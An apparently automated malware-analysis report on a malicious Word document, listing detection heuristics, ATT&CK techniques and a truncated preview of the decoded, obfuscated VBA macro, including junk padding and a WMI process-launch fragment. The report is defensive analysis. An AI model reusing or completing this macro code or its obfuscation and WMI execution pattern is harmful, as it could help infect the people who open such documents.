Verdict: MALICIOUS (Risk Score 282)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1218.011 System Binary Proxy Execution: Rundll32
The sample contains VBA macros with an AutoOpen function, a common technique for initial execution. Critical heuristics indicate the use of WMI (Win32_Process.Create) to launch processes, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions or the identification of a known malware family.
Heuristics (8)

- ClamAV: Doc.Malware.Dpzn-6865611-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dpzn-6865611-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71248 bytes | e1f370ae22697459b7f6ba0690e5749b57126dc6075757d19fe8569418371aae |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "f187_8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "z977___"
Function a_1581()
Select Case u8___54
Case 141956654
d552___6 = Log(j_38_100)
q7901_0 = CDate(383217487)
z95_63 = Fix(82874725 + 288995894 + u__1__5 - Oct(422425769))
h8472309 = Cos(55778994 - Sqr(18233992 - Atn(223715044)) - 505871206 + 542188259)
End Select
Select Case K85419
Case 698904148
p559471 = Log(i3849_)
j78141 = CDate(683132215)
H88_56_ = Fix(108701742 + 903813317 + W6_597_ - Oct(868090278))
u740_496 = Cos(533357870 - Sqr(341462270 - Atn(632316521)) - 476078404 + 625303488)
End Select
Select Case N1_0575
Case 701977373
c56590__ = Log(K77_0_)
l22_66_ = CDate(116663375)
X4_36_1 = Fix(149722758 + 950374534 + a1___4 - Oct(835659259))
z6___5 = Cos(799639788 - Sqr(688856533 - Atn(926479957)) - 31662013 + 485801454)
End Select
Select Case m9_27396
Case 129967426
Q3_6_825 = Log(w796_46)
o91_95 = CDate(361156810)
E45_9__ = Fix(556785616 + 189987487 + m7903_ - Oct(139650993))
n_351_55 = Cos(227596254 - Sqr(179206568 - Atn(55094878)) - 601259883 + 28286985)
End Select
Select Case L214561
Case 446761894
D109891_ = Log(c9162_15)
u95_706 = CDate(79311081)
K120__ = Fix(544391793 + 133731557 + w75_1910 - Oct(174089483))
n68_7__ = Cos(108067178 - Sqr(830594092 - Atn(240270869)) - 933336006 + 462380151)
End Select
Select Case Q__95_7_
Case 181428151
T_55_10 = Log(b19033_)
A__8__02 = CDate(11465388)
q94453 = Fix(288576367 + 4445074 + E_3_454 - Oct(313577242))
w_13_9 = Cos(858385195 - Sqr(110044792 - Atn(467801329)) - 600840426 + 769562470)
End Select
Select Case R252319_
Case 581567838
m5908_6 = Log(a_5_5_)
m53_392_ = CDate(94726157)
z88370 = Fix(784240438 + 100563284 + i_42268_ - Oct(547607043))
r__4698 = Cos(726651913 - Sqr(490859346 - Atn(773329240)) - 445049601 + 305139926)
End Select
Select Case T0199061
Case 915018603
Q82_9_ = Log(N71_8_)
i_98715 = CDate(960467444)
U_899969 = Fix(494251206 + 669914342 + d483355_ - Oct(513131520))
J_255_4 = Cos(252465362 - Sqr(165041257 - Atn(112004879)) - 777505065 + 383175555)
End Select
End Function
Function i31_44_3(d__238, z9_2808)
On Error Resume Next
Select Case D039_0_
Case 561105318
u2__740_ = Log(i_09_0)
K_7___ = CDate(424908732)
B86_13 = Fix(995228095 + 591838933 + R53_578 - Oct(844962620))
f_4__624 = Cos(15122566 - Sqr(113514629 - Atn(900718835)) - 537880740 + 298829582)
End Select
Select Case N5_8__
Case 643234527
K__0_91 = Log(o__2155)
t91908_ = CDate(953791872)
m37_53 = Fix(36705028 + 130603581 + Z816318 - Oct(293840588))
j448_5 = Cos(405331916 - Sqr(568244317 - Atn(174569073)) - 202165896 + 761099037)
End Select
Select Case W_8284
Case 354661361
Y587_7 = Log(V3_0493)
V308__ = CDate(85842245)
j43043 = Fix(227951588 + 465485581 + N99_589 - Oct(96498323))
K4524_3 = Cos(393927434 - Sqr(687833681 - Atn(609330789)) - 353246236 + 484255031)
End Select
v7505___ = b6___7_0 + "winmgmts:Win32_ProcessStartup" + j_65_4_2
Select Case B21_00
Case 323967573
D44563_6 = Log(P097_921)
N38305 = CDate(637051274)
z__8330_ = Fix(748891747 + 689424637 + s3056694 - Oct(178215419))
o_9_029 = Cos(10663314
```

... (truncated)